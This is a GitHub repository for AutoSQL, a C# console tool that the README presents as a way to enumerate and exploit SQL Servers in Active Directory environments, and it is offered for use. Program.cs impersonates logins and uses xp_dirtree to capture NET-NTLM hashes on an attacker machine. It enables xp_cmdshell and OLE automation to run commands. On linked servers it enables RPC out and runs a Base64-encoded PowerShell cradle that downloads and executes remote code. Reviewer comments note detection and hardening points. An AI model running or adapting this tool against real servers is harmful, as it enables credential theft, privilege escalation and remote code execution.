├── AutoSQL
├── SQL.sln
└── SQL
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ └── AssemblyInfo.cs
│ ├── SQL.csproj
│ ├── bin
│ └── x64
│ │ └── Release
│ │ ├── SQL.exe.config
│ │ └── SQL.pdb
│ └── obj
│ ├── Debug
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ └── SQL.csprojAssemblyReference.cache
│ ├── Release
│ └── DesignTimeResolveAssemblyReferencesInput.cache
│ └── x64
│ └── Release
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── SQL.csproj.CoreCompileInputs.cache
│ ├── SQL.csproj.FileListAbsolute.txt
│ ├── SQL.csprojAssemblyReference.cache
│ ├── SQL.exe
│ └── SQL.pdb
├── LICENSE
└── README.md
/AutoSQL/SQL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29409.12
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SQL", "SQL\SQL.csproj", "{50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Debug|x64.ActiveCfg = Debug|x64
19 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Debug|x64.Build.0 = Debug|x64
20 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Release|x64.ActiveCfg = Release|x64
23 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {E0EDCE6B-5596-4004-A0D0-20573AA52A0A}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Data.SqlClient;
3 |
// AutoSQL console program. It opens one SQL Server connection with the
// caller's Windows identity and then walks through a fixed, interactive
// sequence of checks and actions. Every T-SQL statement below is built by
// plain string concatenation from console input and sent over the single
// connection `con`. Lines marked NOTE(review) are reviewer observations for
// people who have to detect or harden against this behaviour.
4 | namespace SQL
5 | {
6 | class Program
7 | {
// Entry point. `args` is never read; all input comes from Console.ReadLine().
// The steps run strictly in order on one connection and no REVERT is issued
// anywhere in this method, so the code relies on an EXECUTE AS context set by
// an earlier step still being active for the statements that follow it.
8 | static void Main(string[] args)
9 | {
10 | Console.WriteLine("------------------------------------------------------------------------------------------");
11 | Console.WriteLine(" AutoSQL is a SQL enumeration and exploitation tool for AD environments");
12 | Console.WriteLine("------------------------------------------------------------------------------------------");
13 | Console.WriteLine("Author: Ananth Gottimukala aka she11z");
14 | Console.WriteLine(" LOVE OFFSEC");
15 | Console.WriteLine("------------------------------------------------------------------------------------------");
16 |
// Server and database names are concatenated verbatim into the connection
// string. Integrated Security = True means no password is supplied: the
// connection authenticates as the Windows account running this process.
17 | Console.Write("\n[Q] Please enter SQL Server domain name (Mostly your current instance): ");
18 | String sqlServer = Console.ReadLine();
19 | Console.Write("[Q] Please enter database name (Mostly it will be master): ");
20 | String database = Console.ReadLine();
21 | String conString = "Server = " + sqlServer + "; Database = " + database + "; Integrated Security = True;";
22 | SqlConnection con = new SqlConnection(conString);
23 |
24 | try
25 | {
26 | con.Open();
27 | Console.WriteLine("\n[+] Authentication Success!");
28 | }
// Bare catch: any exception from Open() (not only a rejected login) is
// reported as an authentication failure, and the process exits with code 0.
29 | catch
30 | {
31 | Console.WriteLine("[-] Authentication Failed");
32 | Environment.Exit(0);
33 | }
34 |
// Identity and role checks: four single-value queries, each read from the
// first column of the first row. None of them is wrapped in a try/catch.
35 | String querylogin = "SELECT SYSTEM_USER;"; //SYSTEM_USER contains the system username of current session login
36 | SqlCommand command = new SqlCommand(querylogin, con);
37 | SqlDataReader reader = command.ExecuteReader();
38 | reader.Read();
39 | Console.WriteLine("[+] Logged in as " + reader[0]);
40 | reader.Close();
41 |
42 | String queryuser = "SELECT USER_NAME();"; //To get Mapped Username
43 | command = new SqlCommand(queryuser, con);
44 | reader = command.ExecuteReader();
45 | reader.Read();
46 | Console.WriteLine("[+] Mapped to User " + reader[0]);
47 | reader.Close();
48 |
49 | String querypublicrole = "SELECT IS_SRVROLEMEMBER('public');"; //Check for user in public role
50 | command = new SqlCommand(querypublicrole, con);
51 | reader = command.ExecuteReader();
52 | reader.Read();
// The value is converted through its string form; a NULL result would not
// parse as an Int32 and that case is not handled here.
53 | Int32 role = Int32.Parse(reader[0].ToString());
54 |
55 | if (role == 1)
56 | {
57 | Console.WriteLine("[+] User is a Member of Public Role");
58 | }
59 | else
60 | {
61 | Console.WriteLine("[-] User is NOT a Member of Public Role");
62 | }
63 | reader.Close();
64 |
65 | String querysysadminrole = "SELECT IS_SRVROLEMEMBER('sysadmin');"; //Check for user in sysadmin role
66 | command = new SqlCommand(querysysadminrole, con);
67 | reader = command.ExecuteReader();
68 | reader.Read();
69 | role = Int32.Parse(reader[0].ToString());
70 |
71 | if (role == 1)
72 | {
73 | Console.WriteLine("[+] User is a Member of SysAdmin Role");
74 | }
75 | else
76 | {
77 | Console.WriteLine("[-] User is NOT a Member of SysAdmin Role");
78 | }
79 | reader.Close();
80 |
// Lists the distinct names of principals recorded as grantor of an
// IMPERSONATE server permission (sys.server_permissions joined to
// sys.server_principals on grantor_principal_id).
// NOTE(review): the same catalog query is useful as an inventory; IMPERSONATE
// grants that are not needed should be revoked.
81 | Console.WriteLine("\n[+] Checking which logins allow impersonation (if any) ...\n");
82 | String imp_query = "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id =b.principal_id WHERE a.permission_name = 'IMPERSONATE';";
83 | command = new SqlCommand(imp_query, con);
84 | reader = command.ExecuteReader();
85 |
86 | while (reader.Read() == true)
87 | {
88 | Console.WriteLine("---> " + reader[0]);
89 | }
90 | reader.Close();
91 |
// Optional impersonation test. Only the exact lowercase answer "y" enables a
// step; anything else skips it. The login name is concatenated unescaped
// into EXECUTE AS LOGIN, and SYSTEM_USER is printed before and after.
// NOTE(review): SQL Server Audit can record these context switches through
// the SERVER_PRINCIPAL_IMPERSONATION_GROUP and
// DATABASE_PRINCIPAL_IMPERSONATION_GROUP action groups.
92 | Console.Write("\n[Q] Do you want to test impersonation against any login if mentioned above? (y/n): ");
93 | String question1 = Console.ReadLine();
94 | if (question1 == "y")
95 | {
96 | try
97 | {
98 | Console.Write("[Q] Please enter the name of login to impersonate: ");
99 | String login_name = Console.ReadLine();
100 |
101 | Console.WriteLine("\n[+] Testing impersonating " + login_name + " login");
102 | queryuser = "SELECT SYSTEM_USER;";
103 | command = new SqlCommand(queryuser, con);
104 | reader = command.ExecuteReader();
105 | reader.Read();
106 | Console.WriteLine("[+] [Before Impersonation] running as " + reader[0]);
107 | reader.Close();
108 | String executeas = "EXECUTE AS LOGIN = '" + login_name + "';";
109 | command = new SqlCommand(executeas, con);
110 | reader = command.ExecuteReader();
111 | reader.Close();
112 | command = new SqlCommand(queryuser, con);
113 | reader = command.ExecuteReader();
114 | reader.Read();
115 | Console.WriteLine("[+] [After Impersonation] running as " + reader[0]);
116 | reader.Close();
117 |
// Second test: switches the session to msdb and impersonates the dbo user
// there, then prints USER_NAME(). This also leaves msdb as the current
// database for the rest of the run.
118 | Console.WriteLine("\n[+] Testing impersonating dbo user in msdb");
119 | queryuser = "SELECT USER_NAME();";
120 | executeas = "use msdb; EXECUTE AS USER = 'dbo'";
121 | command = new SqlCommand(executeas, con);
122 | reader = command.ExecuteReader();
123 | reader.Close();
124 | command = new SqlCommand(queryuser, con);
125 | reader = command.ExecuteReader();
126 | reader.Read();
127 | Console.WriteLine("[+] [After Impersonation] running as " + reader[0]);
128 | reader.Close();
129 | }
130 | catch (Exception e)
131 | {
132 | Console.WriteLine("[-] Failed to Impersonate Message: " + e.Message);
133 | }
134 | }
135 | else
136 | {
137 | }
138 |
// Optional UNC-path step: runs master..xp_dirtree against a share path on the
// address typed in, which makes the SQL Server service attempt an outbound
// SMB connection (and therefore an authentication) to that host. No
// try/catch surrounds this block.
// NOTE(review): egress filtering of SMB from database servers and removing
// EXECUTE on xp_dirtree from the public role both break this step.
139 | Console.Write("\n[Q] Do you want to try get NET-NTLM Hash? [NOTE: Ensure Responder/Impacket is listening] (y/n): ");
140 | String question = Console.ReadLine();
141 | if (question == "y")
142 | {
143 | Console.Write("[Q] Please enter IP for attacker machine running Responder/Impacket: ");
144 | String smb_ip = Console.ReadLine();
145 | Console.WriteLine("[+] Trying to connect SMB share on " + smb_ip + " ...");
146 | String query = "EXEC master..xp_dirtree \"\\\\" + smb_ip + "\\\\test\";";
147 | command = new SqlCommand(query, con);
148 | reader = command.ExecuteReader();
149 | reader.Close();
150 | Console.WriteLine("[+] Please check Responder/Impacket interface on Kali");
151 | }
152 | else
153 | {
154 | }
155 |
// Optional local command-execution step. It impersonates the named login,
// turns on 'show advanced options' and 'xp_cmdshell' through sp_configure,
// then passes the typed command, unquoted, to xp_cmdshell. Nothing here is
// inside a try/catch, and the settings are never switched back afterwards.
// NOTE(review): sp_configure changes are written to the SQL Server error
// log; a change of 'xp_cmdshell' or 'Ole Automation Procedures' to 1 and
// command interpreters started as children of the SQL Server service are
// the telemetry to alert on.
156 | Console.Write("\n[Q] Do you want to try Command Execution on " + sqlServer + " as impersonated user? (y/n): ");
157 | String question2 = Console.ReadLine();
158 | if (question2 == "y")
159 | {
160 | Console.Write("[Q] Please enter the login name like sa: ");
161 | String implogin = Console.ReadLine();
162 | Console.Write("[Q] Please enter command to execute for technique-1 (xp_cmdshell): ");
163 | String cmd = Console.ReadLine();
164 | Console.WriteLine("\n[+] Trying technique-1 by enabling xp_cmdshell procedure if disabled ...");
165 | String impersonateUser = "EXECUTE AS LOGIN = '" + implogin + "';";
166 | String enable_xpcmdshell = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";
167 | String execcmd = "EXEC xp_cmdshell " + cmd;
168 |
169 | command = new SqlCommand(impersonateUser, con);
170 | reader = command.ExecuteReader();
171 | reader.Close();
172 |
173 | command = new SqlCommand(enable_xpcmdshell, con);
174 | reader = command.ExecuteReader();
175 | reader.Close();
176 |
177 | command = new SqlCommand(execcmd, con);
178 | reader = command.ExecuteReader();
// The first row is consumed by this Read() and never printed; the loop below
// prints only the rows after it.
179 | reader.Read();
180 | Console.WriteLine("[+] Command output - ");
181 | while (reader.Read())
182 | {
183 | Console.WriteLine(reader[0]);
184 | }
185 | reader.Close();
186 |
// Technique 2 enables 'Ole Automation Procedures' and uses sp_oacreate /
// sp_oamethod with wscript.shell to run a fixed command that writes a marker
// file. impersonateUser is rebuilt here but not executed again.
// NOTE(review): the hard-coded path C:\Windows\Tasks\she11z.txt is a host
// artefact that shows this step was run on a server.
187 | Console.WriteLine("\n[+] Trying technique-2 by enabling sp_OACreate procedure if disabled ...");
188 | impersonateUser = "EXECUTE AS LOGIN = '" + implogin + "';";
189 | String enable_sp_oacreate = "EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;";
190 | execcmd = "DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'cmd /c \"echo she11z was here! > C:\\Windows\\Tasks\\she11z.txt\"';";
191 |
192 | command = new SqlCommand(enable_sp_oacreate, con);
193 | reader = command.ExecuteReader();
194 | reader.Close();
195 |
196 | command = new SqlCommand(execcmd, con);
197 | reader = command.ExecuteReader();
198 | Console.WriteLine("[+] As a POC, a file named she11z.txt is saved at C:\\Windows\\Tasks directory on SQL server");
199 | reader.Close();
200 | }
201 | else
202 | {
203 | }
204 |
// Optional linked-server listing: runs sp_linkedservers and prints the first
// column of every row. No try/catch surrounds this block.
205 | Console.Write("\n[Q] Do you want to check for linked SQL servers (This can be even done with unprivileged user/login)? (y/n): ");
206 | String question3 = Console.ReadLine();
207 | if (question3 == "y")
208 | {
209 | string execCmd = "EXEC sp_linkedservers;";
210 |
211 | command = new SqlCommand(execCmd, con);
212 | reader = command.ExecuteReader();
213 | Console.WriteLine("\n[+] Linked SQL Servers - ");
214 | while (reader.Read())
215 | {
216 | Console.WriteLine("---> " + reader[0]);
217 | }
218 | reader.Close();
219 | }
220 | else
221 | {
222 | }
223 |
// Optional linked-server access check: runs SELECT SYSTEM_USER on the named
// linked server through OPENQUERY and prints the login it reports. The
// server name is concatenated into the statement unescaped.
// NOTE(review): the login printed here is whatever the linked server's login
// mapping resolves to; mappings to high-privilege remote logins are the
// configuration to look for and remove.
224 | Console.Write("\n[Q] Do you want to check access on linked SQL servers (if mentioned above)? (y/n): ");
225 | String question4 = Console.ReadLine();
226 | if (question4 == "y")
227 | {
228 | Console.Write("[Q] Please enter linked SQL server name: ");
229 | try
230 | {
231 | string linkedsqlserver = Console.ReadLine();
232 | Console.WriteLine("[+] Checking access on: " + linkedsqlserver);
233 | string execLinkedServer = "select myuser from openquery(\"" + linkedsqlserver + "\", 'select SYSTEM_USER as myuser');";
234 | command = new SqlCommand(execLinkedServer, con);
235 | reader = command.ExecuteReader();
236 | reader.Read();
237 | Console.WriteLine("[+] Executing as " + reader[0] + " on " + linkedsqlserver);
238 | reader.Close();
239 | }
240 | catch (Exception e)
241 | {
242 | Console.WriteLine("[-] Cannot make connection to remote SQL server. RPC out could be disabled. Message: " + e.Message);
243 | Console.WriteLine("[-] In next question you can enable and do more...");
244 | }
245 | }
246 | else
247 | {
248 | }
249 |
// Optional remote step against a linked server: optionally impersonates a
// login locally, sets 'rpc out' to true for the named linked server with
// sp_serveroption, enables xp_cmdshell on it through EXEC (...) AT, and then
// runs a PowerShell command there. The whole branch is one try block.
// NOTE(review): the resulting setting is visible in sys.servers
// (is_rpc_out_enabled), and neither it nor the remote sp_configure changes
// are reverted by this code.
250 | Console.Write("\n[Q] Do you want to enable RPC out, xp_cmdshell and execute command on remote SQL server (y/n)?: ");
251 | String question5 = Console.ReadLine();
252 | if (question5 == "y")
253 | {
254 | try
255 | {
256 | Console.Write("\n[Q] Do you want to impersonate any login like sa? Check output of linked SQL server access above (y/n): ");
257 | string question6 = Console.ReadLine();
258 | if (question6 == "y")
259 | {
260 | Console.Write("[Q] Please enter the name of login to impersonate: ");
261 | String login_name = Console.ReadLine();
262 |
263 | Console.WriteLine("\n[+] Testing impersonating " + login_name + " login");
264 | queryuser = "SELECT SYSTEM_USER;";
265 | command = new SqlCommand(queryuser, con);
266 | reader = command.ExecuteReader();
267 | reader.Read();
268 | Console.WriteLine("[+] [Before Impersonation] running as " + reader[0]);
269 | reader.Close();
270 | String executeas = "EXECUTE AS LOGIN = '" + login_name + "';";
271 | command = new SqlCommand(executeas, con);
272 | reader = command.ExecuteReader();
273 | reader.Close();
274 | command = new SqlCommand(queryuser, con);
275 | reader = command.ExecuteReader();
276 | reader.Read();
277 | Console.WriteLine("[+] [After Impersonation] running as " + reader[0]);
278 | reader.Close();
279 | }
280 | else
281 | {
282 | }
283 |
284 | Console.Write("\n[Q] Please enter remote SQL server name: ");
285 | string server = Console.ReadLine();
286 | Console.WriteLine("[+] Trying to enable RPC out using sp_serveroptions");
287 | string serveroption = "EXEC sp_serveroption [" + server + "], 'rpc out', 'true';";
288 | command = new SqlCommand(serveroption, con);
289 | reader = command.ExecuteReader();
// The result of this Read() is ignored; success is printed regardless of
// whether any row came back.
290 | reader.Read();
291 | Console.WriteLine("[+] Done! RPC out enabled for remote SQL server");
292 | reader.Close();
293 |
294 | Console.WriteLine("[+] Enabling xp_cmdshell options");
295 | string enableoption = "EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT [" + server + "]";
296 | command = new SqlCommand(enableoption, con);
297 | reader = command.ExecuteReader();
298 | reader.Close();
299 | Console.WriteLine("[+] Enabling xp_cmdshell procedure");
300 | string enablexpcmdshell = "EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [" + server + "]";
301 | command = new SqlCommand(enablexpcmdshell, con);
302 | reader = command.ExecuteReader();
303 | reader.Close();
// The typed PowerShell text has every double quote removed, is encoded as
// UTF-16LE bytes (Encoding.Unicode), Base64-encoded, and passed to
// "powershell -enc" through xp_cmdshell on the linked server.
// NOTE(review): on the remote host this appears as powershell.exe with an
// encoded command line started under the SQL Server service; process
// creation and PowerShell script block logging capture the decoded content.
304 | Console.WriteLine("\n[NOTE] Please enter PS download cradle with EXACT single & double quotes format --> \"(New-Object System.Net.Webclient).DownloadString('http://XXX.YYY.XXX.ZZZ/Reflection.txt') | iex\"");
305 | Console.Write("\n[Q] Please enter PS download cradle: ");
306 | string shellcode = Console.ReadLine();
307 | string code = shellcode.Replace("\"","");
308 |
309 | var psCommandBytes = System.Text.Encoding.Unicode.GetBytes(code);
310 | var psCommandBase64 = Convert.ToBase64String(psCommandBytes);
311 |
312 |
313 | string shellcodecmd = "EXEC ('xp_cmdshell ''powershell -enc " + psCommandBase64 + "'';') AT [" + server + "]";
314 | Console.WriteLine("[+] Executing Shellcode on " + server + " .Please make sure listener is running");
315 | Console.WriteLine("\n[+] Your PS cradle: " + code);
316 | Console.WriteLine("[+] Whole xp_cmdshell command: " + shellcodecmd);
317 | command = new SqlCommand(shellcodecmd, con);
318 | reader = command.ExecuteReader();
319 | Console.WriteLine("\n[+] Output (if any) - ");
320 | while (reader.Read())
321 | {
322 | Console.WriteLine("---> " + reader[0]);
323 | }
324 | reader.Close();
// This is the only place the connection is closed explicitly; on every other
// path it is left open until the process ends.
325 | con.Close();
326 | }
// Any failure in this branch prints the message and exits with code 0.
327 | catch (Exception e)
328 | {
329 | Console.WriteLine("[-] Error: " + e.Message);
330 | Environment.Exit(0);
331 | }
332 |
333 | }
334 | else
335 | {
336 | }
337 | }
338 | }
339 | }
340 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly-level metadata for the SQL project. Title and product are both
// "SQL"; description, configuration, company, trademark and culture are
// left empty.
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SQL")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SQL")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
// NOTE(review): this is the same value as the project GUID in SQL.sln and
// SQL.csproj. It is emitted into the compiled assembly's metadata, so it
// stays constant across rebuilds of this project and can serve as a static
// indicator when identifying binaries built from it.
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("50a18b76-c1e6-45a1-8a04-4df9af4c151b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
// Both version attributes are fixed at 1.0.0.0.
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/SQL.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {50A18B76-C1E6-45A1-8A04-4DF9AF4C151B}
8 | Exe
9 | SQL
10 | SQL
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | MinimumRecommendedRules.ruleset
44 | true
45 |
46 |
47 | bin\x64\Release\
48 | TRACE
49 | true
50 | pdbonly
51 | x64
52 | 7.3
53 | prompt
54 | MinimumRecommendedRules.ruleset
55 | true
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/bin/x64/Release/SQL.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/bin/x64/Release/SQL.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/bin/x64/Release/SQL.pdb
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/Debug/SQL.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/Debug/SQL.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 0ad2913c3c24bfd3eb472a8770b9e4a19a0c875d
2 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | \\192.168.49.84\visualstudio\SQL\SQL\bin\x64\Release\SQL.exe.config
2 | \\192.168.49.84\visualstudio\SQL\SQL\bin\x64\Release\SQL.exe
3 | \\192.168.49.84\visualstudio\SQL\SQL\bin\x64\Release\SQL.pdb
4 | \\192.168.49.84\visualstudio\SQL\SQL\obj\x64\Release\SQL.csprojAssemblyReference.cache
5 | \\192.168.49.84\visualstudio\SQL\SQL\obj\x64\Release\SQL.exe
6 | \\192.168.49.84\visualstudio\SQL\SQL\obj\x64\Release\SQL.pdb
7 | \\192.168.49.84\visualstudio\SQL\SQL\obj\x64\Release\SQL.csproj.CoreCompileInputs.cache
8 | \\192.168.49.62\visualstudio\SQL\SQL\bin\x64\Release\SQL.exe.config
9 | \\192.168.49.62\visualstudio\SQL\SQL\bin\x64\Release\SQL.exe
10 | \\192.168.49.62\visualstudio\SQL\SQL\bin\x64\Release\SQL.pdb
11 | \\192.168.49.62\visualstudio\SQL\SQL\obj\x64\Release\SQL.csprojAssemblyReference.cache
12 | \\192.168.49.62\visualstudio\SQL\SQL\obj\x64\Release\SQL.exe
13 | \\192.168.49.62\visualstudio\SQL\SQL\obj\x64\Release\SQL.pdb
14 |
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/x64/Release/SQL.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/x64/Release/SQL.exe
--------------------------------------------------------------------------------
/AutoSQL/SQL/obj/x64/Release/SQL.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ananth-she11z/AutoSQL/3a73b3f766b7a37bcb6641067a1e9174b8408844/AutoSQL/SQL/obj/x64/Release/SQL.pdb
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 she11z
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AutoSQL
2 | ## A tool to Enumerate and Exploit SQL Servers in AD Environments.
3 |
4 | ## Features:
5 |
6 | 1) Checks authentication and roles on the current instance as the currently logged-in user.
7 | 2) Checks which logins can be impersonated.
8 | 3) Allows login impersonation.
9 | 4) Allows UNC path injection to grab NET-NTLM hash on Responder or Impacket.
10 | 5) Allows command execution test via xp_cmdshell and sp_OACreate procedures on current instance.
11 | 6) Checks for linked SQL servers in the domain.
12 | 7) Checks access on any linked SQL server.
13 | 8) Allows enabling RPC on the current instance towards any linked SQL server, and enables the xp_cmdshell procedure to execute a PS command on the remote linked SQL server.
14 |
15 | ### Please ping me at ananth DOT venk88 AT gmail DOT com for any changes or issues. Anyway folks, it's open-source C# code, feel free to modify and attack ;)
16 |
17 | ## Love Offsec & Love Hacking!!
18 |
19 | Ananth Gottimukala
20 | (she11z)
21 |
--------------------------------------------------------------------------------